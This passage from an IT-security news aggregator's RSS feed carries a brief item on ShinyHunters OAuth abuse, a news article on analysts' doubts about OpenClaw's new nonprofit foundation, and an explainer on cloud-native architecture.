<pubDate>Tue, 14 Jul 2026 00:52:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft Threat Intelligence identified threat actor activity with overlapping tradecraft commonly associated with ShinyHunters, including voice phishing (vishing), supply-chain compromise, and misconfigured guest access targeting SaaS-based applications.</p>
<p>The post <a href="https://www.microsoft.com/en-us/security/blog/2026/07/13/defending-saas-based-applications-against-shinyhunters-oauth-abuse/">Defending SaaS-based applications against ShinyHunters OAuth abuse</a> appeared first on <a href="https://www.microsoft.com/en-us/security/blog">Microsoft Security Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw becomes a nonprofit foundation as it seeks to be ‘the Switzerland of AI’]]></title>
<description><![CDATA[OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that the popular platform has thus far lacked. Still, some worry about the risks created by the move. 



“Our ambition is for OpenClaw...]]></description>
<link>https://tsecurity.de/de/3666484/it-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666484/it-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</guid>
<pubDate>Mon, 13 Jul 2026 23:17:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that <a href="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html" target="_blank">the popular platform </a>has thus far lacked. Still, some worry about the risks created by the move. </p>



<p class="wp-block-paragraph">“Our ambition is for OpenClaw to be the Switzerland of AI. Neutral ground where every model and every lab can plug into the technology and collaborate on standards in the era of agents,” <a href="https://openclaw.ai/blog/introducing-openclaw-foundation/" target="_blank" rel="noreferrer noopener">OpenClaw said in a post</a>. “That work is already underway in Foundation-convened councils on agent identity, agent profiles, evals, and enterprise deployment.”</p>



<p class="wp-block-paragraph">The statement, co-authored by OpenClaw creator <a href="https://www.linkedin.com/in/steipete/" target="_blank" rel="noreferrer noopener">Peter Steinberger</a>, pointed out, “the great open source projects of our time — Linux, Apache, Mozilla — endure because a neutral steward stands behind them. That is the role we are taking on to keep OpenClaw MIT licensed, open, and independent so that everyone building on it can trust it will be here for the long term.”</p>



<p class="wp-block-paragraph">But it reassured users that the original OpenClaw leadership is still in charge.</p>



<p class="wp-block-paragraph">“Peter built this thing and Peter keeps making the calls, especially the technical ones. Since joining OpenAI earlier this year, he has continued to steward OpenClaw as an open and independent project, and OpenAI has made a commitment to keep it that way,” the post said. “The foundation is here to serve: good governance, stable funding, and paying the people who keep the claws alive.”</p>



<p class="wp-block-paragraph">However, some analysts and consultants were skeptical about how much true independence Steinberger would have, given his salaried role with OpenAI. </p>



<h2 class="wp-block-heading">Neutrality claim in question</h2>



<p class="wp-block-paragraph">“The Switzerland of AI neutrality claim collapses under its own announcement,” said <a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520. “OpenAI runs a team [at OpenAI] called Claw Labs that Peter leads and OpenAI is a major donor to OpenClaw. The ‘neutral steward’s’ chief technical decision maker is employed by one of the competing labs it is supposed to be neutral with.” To OpenAI, he said, OpenClaw is closer to a tax-exempt nonprofit subsidiary than it is to a neutral ‘Switzerland of AI.’</p>



<p class="wp-block-paragraph">He pointed out that, in addition, Microsoft is shipping <a href="https://www.computerworld.com/article/4173442/enterpriseclaw-wants-to-bring-governance-to-the-openclaw-era-2.html" target="_blank">the enterprise version</a> of OpenClaw, and Nvidia is shipping the hardware bundle. “This is being called the Switzerland of AI, but Switzerland does not have its central bank run by France,” he observed.</p>



<p class="wp-block-paragraph">Kenney said that what the new OpenClaw has actually built is “a shared dependency that several competitors fund, staff, and steer, wrapped in a nonprofit structure. Enterprise IT should understand that structure, because treating OpenClaw as neutral is a mistake,” adding that CIOs need to look at this development devoid of the emotional component. </p>



<p class="wp-block-paragraph">“There is a strategic irony here that CIOs should sit with,” Kenney said. “If OpenClaw succeeds at becoming the universal agent substrate, then every model plugs into the same identity layer, the same profiles, and the same deployment plumbing. The thing every vendor is racing to own becomes a commodity that nobody owns.” He pointed out that, in the short term, that is genuinely good news for buyers because it means less lock-in and more portability.</p>



<p class="wp-block-paragraph">“But,” he said, “when the connective tissue is free and natural, the only labs that benefit are the ones with the best models and the deepest distribution. Commoditize the layer below you and you compete on the layer where you are already strongest. The foundation is not a charity. It is the biggest players agreeing to stop fighting over the plumbing so they can fight over the water, and the enterprise is the one paying the water bill either way.”</p>



<h2 class="wp-block-heading">Good news, bad news</h2>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, liked the potential consistency that could emerge from the structural change, given the complexity of agent development today. </p>



<p class="wp-block-paragraph">“We are seeing a lot of OpenClaw variants hit the market, such as those from Nvidia as well as competing products from cloud and SaaS vendors. A common base helps solidify the common parts,” Andersen noted. “That said, a common challenge is the sustainability of these open source foundations over time. In addition to releasing code, these foundations need funding to evolve and grow. And that funding needs to come from continued momentum to incentivize existing members to increase investment and recruit new members to join.”</p>



<p class="wp-block-paragraph">Andersen stressed that IT buyers need to keep an eye on the roadmap for any OpenClaw variant they choose to deploy, “as that will directly impact the foundation, and the momentum of the foundation and common base. If the common base loses momentum, it can lead to forks, or just a loss of innovation. When that happens, members tend to back away, which puts customers in limbo.”</p>



<p class="wp-block-paragraph">But not everyone sees the promised structure as entirely good for IT.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/ishraqkhann/" target="_blank" rel="noreferrer noopener">Ishraq Khan</a>, CEO at coding productivity tool vendor Kodezi, said, “most CIOs do not want to bet their future entirely on a single model vendor. They want Claude for some workloads, GPT for others, open models for sensitive environments, and potentially internally fine-tuned systems for specific use cases. The problem is that every vendor currently brings its own identity system, tool interfaces, permissions model, and operational assumptions. That fragmentation does not scale.”</p>



<p class="wp-block-paragraph">He said, “the risk if standards fail is straightforward: every vendor builds its own closed ecosystem, enterprises become locked into individual stacks, and security becomes dramatically harder. The opportunity if OpenClaw succeeds is equally significant: enterprises get portable agents, common identity standards, interoperable tooling, and a healthier competitive market around models rather than ecosystems.”</p>



<h2 class="wp-block-heading">Will it remain a nonprofit?</h2>



<p class="wp-block-paragraph">However, said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, one of the key details that IT executives will want to keep in mind is that OpenAI also began as a nonprofit, but it was quickly <a href="https://www.computerworld.com/article/4056490/openai-microsoft-discuss-shape-of-future-relationship.html" target="_blank">seen as not adhering to nonprofit objectives</a>. </p>



<p class="wp-block-paragraph">“OpenAI’s transition from a nonprofit research organization into a more complex structure highlighted the challenge of maintaining mission alignment while scaling technology, capital, partnerships, and commercial operations,” Greis said. “OpenClaw has the opportunity to address some of those governance questions earlier by establishing clear principles around neutrality, transparency, and decision-making before the ecosystem becomes even larger and more valuable.”</p>



<p class="wp-block-paragraph">He noted, “we have seen this pattern before with technologies like Linux and Kubernetes. The strongest open ecosystems succeeded because they created trusted foundations that enterprises could build upon. The technology was important, but the governance model that underpinned it was equally critical.”</p>



<h2 class="wp-block-heading">Risks are ‘squarely in IT’s lap’</h2>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, echoed Greis’ concerns. </p>



<p class="wp-block-paragraph">“CIOs shouldn’t assume that this nonprofit will always be a nonprofit, or confuse being a nonprofit with actually being neutral or unbiased,” he said. “The risks are squarely in IT’s lap: autonomous agents ‘with their own identity’ acting on a user’s behalf blow straight through traditional IAM assumptions. Issues, such as agent identity, auditability, secret handling. Identity boundaries have not yet been reliably solved. Until they are, enterprises should treat OpenClaw agents like privileged service accounts, not like a browser plugin.”</p>



<p class="wp-block-paragraph">Independent cybersecurity and risk advisor <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a> pointed to another IT exposure that might come from this OpenClaw transition: Cost.</p>



<p class="wp-block-paragraph">“OpenClaw currently has a very high token burn rate in usage, which presents a significant cost consideration for large-scale enterprise adoption,” he said. “The skills marketplace introduces <a href="https://www.csoonline.com/article/4129867/what-cisos-need-to-know-about-clawdbot-i-mean-moltbot-i-mean-openclaw.html" target="_blank">a new supply chain threat </a>that enterprises will need to manage. Threat management, and specifically handling <a href="https://www.csoonline.com/article/4135449/compromised-npm-package-silently-installs-openclaw-on-developer-machines.html" target="_blank">external marketplace elements</a>, can be highly challenging for open-source operations. Ultimately, at scale, enterprise adoption could become a difficult balancing act between managing high operational costs and securing an expanded security surface.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloud native explained: How to build scalable, resilient applications]]></title>
<description><![CDATA[What is cloud native? Cloud native defined



The term “cloud-native computing” encompasses the modern approach to building and running software applications that exploit the flexibility, scalability, and resilience of cloud computing. The phrase is a catch-all that encompasses not just the speci...]]></description>
<link>https://tsecurity.de/de/3665670/ai-nachrichten/cloud-native-explained-how-to-build-scalable-resilient-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665670/ai-nachrichten/cloud-native-explained-how-to-build-scalable-resilient-applications/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:33 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading"><strong>What is cloud native? Cloud native defined</strong></h2>



<p class="wp-block-paragraph">The term “cloud-native computing” encompasses the modern approach to building and running software applications that exploit the flexibility, scalability, and resilience of cloud computing. The phrase is a catch-all that encompasses not just the specific architecture choices and environments used to build applications for the public cloud, but also the software engineering techniques and philosophies used by cloud developers.</p>



<p class="wp-block-paragraph">The <a href="https://www.cncf.io/">Cloud Native Computing Foundation</a> (CNCF) is an open source organization that hosts many important cloud-related projects and helps set the tone for the world of cloud development. The CNCF offers its own definition of cloud native:</p>



<p class="wp-block-paragraph"><em>Cloud native practices empower organizations to develop, build, and deploy workloads in computing environments (public, private, hybrid cloud) to meet their organizational needs at scale in a programmatic and repeatable manner. It is characterized by loosely coupled systems that interoperate in a manner that is secure, resilient, manageable, sustainable, and observable.</em></p>



<p class="wp-block-paragraph"><em>Cloud native technologies and architectures typically consist of some combination of containers, service meshes, multi-tenancy, microservices, immutable infrastructure, serverless, and declarative APIs — this list is not exhaustive.</em></p>



<p class="wp-block-paragraph">This definition is a good start, but as cloud infrastructure becomes ubiquitous, the cloud native world is beginning to spread behind the core of this definition. We’ll explore that evolution as well, and look into the near future of cloud-native computing.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<h2 class="wp-block-heading"><strong>Cloud native architectural principles</strong></h2>



<p class="wp-block-paragraph">Let’s start by exploring the pillars of cloud-native architecture. Many of these technologies and techniques were considered innovative and even revolutionary when they hit the market over the past few decades, but now have become widely accepted across the software development landscape.</p>



<p class="wp-block-paragraph"><strong>Microservices. </strong>One of the huge cultural shifts that made cloud-native computing possible was the move from huge, monolithic applications to <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a>: small, loosely coupled, and independently deployable components that work together to form a cloud-native application. These microservices can be scaled across cloud environments, though (as we’ll see in a moment) this makes systems more complex.</p>



<p class="wp-block-paragraph"><strong>Containers and orchestration. </strong>In could-native architectures, individual microservices are executed inside <em>containers </em>— lightweight, portable virtual execution environments that can run on a variety of servers and cloud platforms. Containers insulate the developers from having to worry about the underlying machines on which their code will execute. That is, all they have to do is write to the container environment. </p>



<p class="wp-block-paragraph">Getting the containers to run properly and communicate with one another is where the complexity of cloud native computing starts to emerge. Initially, containers were created and managed by relatively simple platforms, the most common of which was <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a>. But as cloud-native applications got more complex, container orchestration platforms<em> </em>that augmented Docker’s functionality emerged, such as Kubernetes, which allows you to deploy and manage multi-container applications at scale. Kubernetes is critical to cloud native computing as we know it — it’s worth noting that the CNCF was set up as a <a href="https://www.zdnet.com/article/cloud-native-computing-foundation-seeks-to-bring-more-cloud-and-container-unity/">spinoff of the Linux Foundation on the same day that Kubernetes 1.0 was announced</a> — and adhering to <a href="https://www.infoworld.com/article/2338688/6-best-practices-to-keep-kubernetes-costs-under-control.html">Kubernetes best practices</a> is an important key to cloud native success. </p>



<p class="wp-block-paragraph"><strong>Open standards and APIs. </strong>The fact that containers and cloud platforms are largely defined by open standards and <a href="https://www.infoworld.com/article/3800992/open-source-trends-for-2025-and-beyond.html">open source technologies</a> is the secret sauce that makes all this modularity and orchestration possible, and <a href="https://www.infoworld.com/article/3529600/how-do-you-govern-a-sprawling-disparate-api-portfolio.html">standardized and documented APIs </a>offer the means of communication between distributed components of a larger application. In theory, anyway, this standardization means that every component should be able to communicate with other components of an application without knowing about their inner workings, or about the inner workings of the various platform layers on which everything operates.</p>



<p class="wp-block-paragraph"><strong>DevOps, agile methodologies, and infrastructure as code. </strong>Because cloud-native applications exist as a series of small, discrete units of functionality, cloud-native teams can build and update them using agile philosophies like <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">DevOps</a>, which promotes <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">rapid, iterative CI/CD development</a>. This enables teams to deliver business value more quickly and more reliably.</p>



<p class="wp-block-paragraph">The virtualized nature of cloud environments also make them great candidates for <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a> (IaC), a practice in which teams use tools like <a href="https://developer.hashicorp.com/terraform/intro">Terraform</a>, <a href="https://www.pulumi.com/">Pulumi</a>, and <a href="https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/Welcome.html">AWS CloudFormation</a>, to manage infrastructure declaratively and version those declarations just like application code. IaC boosts automation, repeatability, and resilience across environments—all big advantages in the cloud world. IaC also goes hand-in-hand with the concept of <em>immutable infrastructure</em>—the idea that, once deployed, infastructure-level entities like virtual machines, containers, or network appliances don’t change, which makes them easier to manage and secure. IaC stores declarative configuration code in version control, which creates an audit log of any changes.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/04/5_things_cloud_native.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Chart listing five things to love and five things to fear when considiering cloud native" class="wp-image-3970036" width="1024" height="472" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>There’s a lot to love about cloud-native architectures, but there are also several things to be wary of when considering it.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading"><strong>How the cloud-native stack is expanding</strong></h2>



<p class="wp-block-paragraph">As cloud-native development becomes the norm, the cloud-native ecosystem is expanding; the CNCF maintains a graphical representation of what it calls the  <a href="https://landscape.cncf.io/">cloud native landscape</a> that hammers home to expansive and bewildering variety of products, services, and open source projects that contribute to (and seek to profit from) to cloud-native computing. And there are a number of areas where new and developing tools are complicating the picture sketched out by the pillars we discussed above.   </p>



<p class="wp-block-paragraph"><strong>An expanding Kubernetes ecosystem.</strong> <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes </a>is complex, and teams now rely on an <a href="https://www.infoworld.com/article/2265338/13-tools-that-make-kubernetes-better.html">entire ecosystem of projects </a>to get the most out of it: <a href="https://www.infoworld.com/article/2264445/helm-3-package-manager-arrives-for-kubernetes.html">Helm</a> for packaging, <a href="https://argo-cd.readthedocs.io/en/stable/">ArgoCD </a>for GitOps-style deployments, and <a href="https://kustomize.io/">Kustomize </a>for configuration management. And just as Kubernetes augmented Docker for enterprise-scale deployments. Kubernetes itself has been augmented and expanded by <a href="https://www.infoworld.com/article/2261159/what-is-a-service-mesh-easier-container-networking.html">service mesh</a> offerings like <a href="https://istio.io/">Istio </a>and <a href="https://linkerd.io/">Linkerd</a><strong>, </strong>which offer fine-grained traffic control and improved security</p>



<p class="wp-block-paragraph"><strong>Observability needs. </strong>The complex and distributed world of cloud-native computing requires in-depth <a href="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html">observability</a> to ensure that developers and admins have a handle on what’s happening with their applications. <a href="https://www.infoworld.com/article/2337343/what-observability-means-for-cloud-operations.html">Cloud-native observability</a> uses distributed tracing and aggregated logs to provide deep insight into performance and reliability. Tools like <a href="https://www.infoworld.com/article/2246709/prometheus-unbound-open-source-cloud-monitoring.html">Prometheus</a>, <a href="https://www.infoworld.com/article/2337267/grafana-shining-a-light-into-kubernetes-clusters.html">Grafana</a>, <a href="https://www.cncf.io/projects/jaeger/">Jaeger</a>, and <a href="https://opentelemetry.io/">OpenTelemetry</a> support comprehensive, real-time observability across the stack.</p>



<p class="wp-block-paragraph"><strong>Serverless computing.  </strong><a href="https://www.infoworld.com/article/2261831/what-is-serverless-serverless-computing-explained.html">Serverless computing</a>, particularly in its function-as-a-service guise, offers to strip needed compute resources down to their bare minimum, with functions running on service provider clouds using exactly as much as they need and no more. Because these services can be exposed as endpoints via APIs, they are increasingly integrated into distributed applications, operating side-by-side with functionality provided by containerized microservices. Watch out, though: the big FaaS providers (<a href="https://www.infoworld.com/article/2265860/aws-lambda-tutorial-get-started-with-serverless-computing.html">Amazon</a>, <a href="https://www.infoworld.com/article/2255377/how-to-work-with-azure-functions-in-csharp.html">Microsoft</a>, and <a href="https://www.infoworld.com/article/2243861/google-takes-aims-at-aws-lambda-with-cloud-functions.html">Google</a>) would love to lock you in to their ecosystems.  </p>



<p class="wp-block-paragraph"><strong>FinOps. </strong><a href="http://infoworld.com/article/2238873/what-is-cloud-computing.html">Cloud computing</a> was initially billed as a way to cut costs — no need to pay for an in-house data center that you barely use — but in practice it replaces capex with opex, and sometimes you can run up truly shocking cloud service bills if you aren’t careful. Serverless computing is one way to cut down on those costs, but financial operations, or <a href="https://www.cio.com/article/416337/what-is-finops-your-guide-to-cloud-cost-management.html">FinOps</a>, is a more systematic discipline that aims to aligns engineering, finance, and product to optimize cloud spending. <a href="https://www.infoworld.com/article/2338592/6-finops-best-practices-to-reduce-cloud-costs.html">FinOps best practices</a> make use of those observability tools to best determine what departments and applications are eating up resources.</p>



<h2 class="wp-block-heading"><strong>How cloud-native architecture is adapting to AI workloads</strong></h2>



<p class="wp-block-paragraph">Enterprises deploy larger AI models and make use of more and more real-time inference services. That’s putting demands on cloud-native systems and forcing them to adapt to remain scalable and reliable.</p>



<p class="wp-block-paragraph">For instance, organizations are <a href="https://www.infoworld.com/article/4057189/the-rise-of-ai-ready-private-clouds.html">re-engineering cloud environments</a> around GPU-accelerated clusters, low-latency networking, and predictable orchestration. These needs align with established cloud-native patterns: containers package AI services consistently, while Kubernetes provides resilient scheduling and horizontal scale for inference workloads that can spike without warning.</p>



<p class="wp-block-paragraph">Kubernetes itself is <a href="https://www.infoworld.com/article/4045563/evolving-kubernetes-for-generative-ai-inference.html">changing to better support AI inference</a>, adding hardware-aware scheduling for GPUs, model-specific autoscaling behavior, and deeper observability into inference pipelines. These enhancements make Kubernetes a more natural platform for serving generative AI workloads.</p>



<p class="wp-block-paragraph">AI’s resource demands are amplifying traditional cloud-native challenges. Observability becomes more complex as inference paths span GPUs, CPUs, vector databases, and distributed storage. <a href="https://www.cio.com/article/416337/what-is-finops-your-guide-to-cloud-cost-management.html">FinOps</a> teams contend with cost volatility from training and inference bursts. And security teams must track new risks around model provenance, data access, and supply-chain integrity.</p>



<h2 class="wp-block-heading"><strong>Application frameworks for building distributed cloud-native apps</strong></h2>



<p class="wp-block-paragraph">Microsoft’s Aspire is one of the most visible examples of a shift towards application frameworks to simplify how teams build distributed systems. Opinionated frameworks like Aspire provide structure, observability, and integration out of the box so developer don’t need to stitch together containers, microservices, and orchestration tooling by hand.</p>



<p class="wp-block-paragraph">Aspire in particular is a <a href="https://www.infoworld.com/article/4023638/taking-net-aspire-for-a-spin.html">prescriptive framework for cloud-native applications</a>, bundling containerized services, environment configuration, health checks, and observability into a unified development model. Aspire provides defaults for service-to-service communication, configuration, and deployment, along with a built-in dashboard for visibility across distributed components.</p>



<p class="wp-block-paragraph">While Aspire was originally aligned with Microsoft’s .<a href="https://www.infoworld.com/article/2264488/what-is-the-net-framework-microsofts-answer-to-java.html">NET platform</a>,Redmond now sees it as having a<strong>  </strong><a href="https://www.infoworld.com/article/4085051/aspires-polyglot-future.html?utm_source=chatgpt.com">polyglot future</a>. This positions Aspire as part of a broader trend: frameworks that help teams build cloud-native, service-oriented systems without being locked into a single language ecosystem. Several other frameworks are gaining traction: Dapr provides a portable runtime that abstracts many of the plumbing tasks in cloud-native distributed applications, and Orleans offers an actor-model-based framework for large-scale systems in the .NET world, and Akka gives JVM teams a mature, reactive toolkit for elastic, resilient services.</p>



<h2 class="wp-block-heading"><strong>Frameworks and tools in the expanding cloud-native ecosystem</strong></h2>



<p class="wp-block-paragraph">While frameworks like Aspire simplify how developers compose and structure distributed applications, most cloud-native systems still depend on a broader ecosystem of platforms and operational tooling. This deeper layer is where much of the complexity—and innovation—of cloud-native computing lives, particularly as Kubernetes continues to serve as the industry’s control plane for modern infrastructure.</p>



<p class="wp-block-paragraph">Kubernetes provides the core abstractions for deploying and orchestrating containerized workloads at scale. Managed distributions such as Google Kubernetes Engine (GKE), Amazon EKS, <a href="https://www.infoworld.com/article/4058764/smoother-kubernetes-sailing-with-aks-automatic.html">Azure AKS</a>, and Red Hat OpenShift build on these primitives with security, lifecycle automation, and enterprise support. Platform vendors are increasingly automating cluster operations—upgrades, scaling, remediation—to reduce the operational burden on engineering teams.</p>



<p class="wp-block-paragraph">Surrounding Kubernetes is a rapidly expanding ecosystem of complementary frameworks and tools. <a href="https://www.infoworld.com/article/2261159/what-is-a-service-mesh-easier-container-networking.html">Service meshes</a> like Istio and Linkerd provide fine-grained traffic management, policy enforcement, and mTLS-based security across microservices. <a href="https://www.infoworld.com/article/2259088/what-is-gitops-extending-devops-to-kubernetes-and-beyond.html">GitOps</a> platforms such as Argo CD and Flux bring declarative, version-controlled deployments to cloud-native environments. Meanwhile, projects like Crossplane turn Kubernetes into a universal control plane for cloud infrastructure, letting teams provision databases, queues, and storage through familiar Kubernetes APIs. These tools illustrate how cloud-native development now spans multiple layers: developer-focused application frameworks like Aspire at the top, and a powerful, evolving Kubernetes ecosystem underneath that keeps modern distributed applications running.</p>



<h2 class="wp-block-heading"><strong>Advantages and challenges for cloud-native development</strong></h2>



<p class="wp-block-paragraph">Cloud native has become so ubiquitous that its advantages are almost taken for granted at this point, but it’s worth reflecting on the beneficial shift the cloud native paradigm represents. Huge, monolithic codebases that saw updates rolled out once every couple of years have been replaced by microservice-based applications that can be improved continuously. Cloud-based deployments, when managed correctly, make better use of compute resources and allow companies to offer their products as SaaS or PaaS services. </p>



<p class="wp-block-paragraph">But <a href="https://www.infoworld.com/article/2337882/the-downsides-of-cloud-native-solutions.html">cloud-native deployments come with a number of challenges</a>, too:</p>



<ul class="wp-block-list">
<li><strong>Complexity and operational overhead: </strong>You’ll have noticed by now that many of the cloud-native tools we’ve discussed, like service meshes and observability tools, are needed to deal with the complexity of cloud-native applications and environments. Individual microservices are deceptively simple, but coordinating them all in a distributed environment is a big lift.</li>



<li><strong>Security: </strong>More services executing on more machines, communicating by open APIs, all adds up to a bigger attack surface for hackers. <a href="https://www.csoonline.com/article/572501/managing-container-vulnerability-risks-tools-and-best-practices.html">Containers</a> and <a href="https://www.csoonline.com/article/3618243/securing-cloud-native-applications-why-a-comprehensive-api-security-strategy-is-essential.html">APIs</a> each have their own special security needs, and a <a href="https://www.infoworld.com/article/2259477/open-policy-agent-a-general-purpose-policy-engine-for-cloud-native.html">policy engine</a> can be an important tool for imposing a security baseline on a sprawling cloud-native app. <a href="https://www.csoonline.com/article/564095/what-is-devsecops-developing-more-secure-applications.html">DevSecOps</a>, which adds security to DevOps, has become an important cloud-native development practice to try to close these gaps.</li>



<li><strong>Vendor lock-in: </strong>This may come as a surprise, since cloud-native is based on open standards and open source. But there are differences in how the big cloud and serverless providers works, and once you’ve written code with one provider in mind, <a href="https://www.infoworld.com/article/2337012/get-used-to-cloud-vendor-lock-in.html">it can be hard to migrate elsewhere</a>.</li>



<li><strong>A persistent skills gap: </strong>Cloud-native computing and development may have years under its belt at this point, but the number of developers who are truly skilled in this arena is a smaller portion of the workforce than you’d think. Companies <a href="https://www.infoworld.com/article/3484912/a-strategic-road-map-for-navigating-the-cloud-skills-shortage.html">face difficult choices in bridging this skills gap</a>, whether that’s bidding up salaries, working to upskill current workers, or allowing remote work so they can cast a wide net. </li>
</ul>



<h2 class="wp-block-heading">Cloud native in the real world</h2>



<p class="wp-block-paragraph">Cloud native computing is often associated with giants like Netflix, Spotify, Uber, and AirBNB, where many of its technologies were pioneered in the early ’10s. But the CNCF’s <a href="https://www.cncf.io/case-studies/">Case Studies page</a> provides an in-depth look at how cloud native technologies are helping companies. Examples include the following:</p>



<ul class="wp-block-list">
<li>A UK-based payment technology company that can <a href="https://www.cncf.io/case-studies/form3/">switch between data centers and clouds</a> with zero downtime</li>



<li>A software company whose product collects and analyzes data from IoT devices — and can <a href="https://www.cncf.io/case-studies/tempestive/">scale up</a> as the number of gadgets grows</li>



<li>A Czech web service company that managed to <a href="https://www.cncf.io/case-studies/seznam/">improve performance while reducing costs</a> by migrating to the cloud</li>
</ul>



<p class="wp-block-paragraph">Cloud-native infrastructure’s capability to quickly scale up to large workloads also make it an attractive platform for developing AI/ML applications: another one of those CNCF case studies looks at how IBM uses Kubernetes to <a href="https://www.cncf.io/case-studies/ibmwatsonxassistant/">train its Watsonx assistant</a>. The big three providers are putting a lot of effort into pitching their platforms as the place for you to develop your own generative AI tools, with offerings like <a href="https://www.infoworld.com/article/3608598/microsoft-rebrands-azure-ai-studio-to-azure-ai-foundry.html">Azure AI Foundry,</a><a href="https://www.infoworld.com/article/3959648/google-unveils-firebase-studio-for-ai-app-development.html">Google Firebase Studio</a>, and <a href="https://www.infoworld.com/article/2336139/amazon-bedrock-a-solid-generative-ai-foundation.html">Amazon Bedrock</a>. It seems clear that cloud native technology is ready for what comes next.</p>



<h2 class="wp-block-heading">Learn more about related cloud-native technologies:</h2>



<ul class="wp-block-list">
<li><a href="https://www.infoworld.com/article/2256066/what-is-paas-platform-as-a-service-a-simpler-way-to-build-software-applications.html">Platform-as-a-service (PaaS) explained</a></li>



<li><a href="https://www.infoworld.com/article/2238873/what-is-cloud-computing.html">What is cloud computing</a></li>



<li><a href="https://www.infoworld.com/article/2256706/what-is-multicloud-the-next-step-in-cloud-computing.html">Multicloud explained</a></li>



<li><a href="https://www.infoworld.com/article/2259475/what-is-agile-methodology-modern-software-development-explained.html">Agile methodology explained</a></li>



<li><a href="https://www.infoworld.com/article/2259487/how-to-excel-in-agile-software-development.html">Agile development best practices</a></li>



<li><a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">Devops explained</a></li>



<li><a href="https://www.infoworld.com/article/2266905/devops-best-practices-the-5-methods-you-should-adopt.html">Devops best practices</a></li>



<li><a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">Microservices explained</a></li>



<li><a href="https://www.infoworld.com/article/2253197/tutorial-how-to-build-microservices-apps.html">Microservices tutorial</a></li>



<li><a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker and Linux containers explained</a></li>



<li><a href="https://www.infoworld.com/article/2254159/how-to-get-started-with-kubernetes-2.html">Kubernetes tutorial</a></li>



<li><a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD (continuous integration and continuous delivery) explained</a></li>



<li><a href="https://www.infoworld.com/article/2268012/get-started-with-cicd-automating-application-delivery-with-cicd-pipelines.html">CI/CD best practices</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is cloud computing? From infrastructure to autonomous, agentic-driven ecosystems]]></title>
<description><![CDATA[Cloud computing continues to be the platform of choice for large applications and a driver of innovation in enterprise technology. Gartner forecasts public cloud spending alone to  the public cloud services market alone will reach $1.42 trillion in current U.S. dollars, driven by AI workloads and...]]></description>
<link>https://tsecurity.de/de/3665669/ai-nachrichten/what-is-cloud-computing-from-infrastructure-to-autonomous-agentic-driven-ecosystems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665669/ai-nachrichten/what-is-cloud-computing-from-infrastructure-to-autonomous-agentic-driven-ecosystems/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
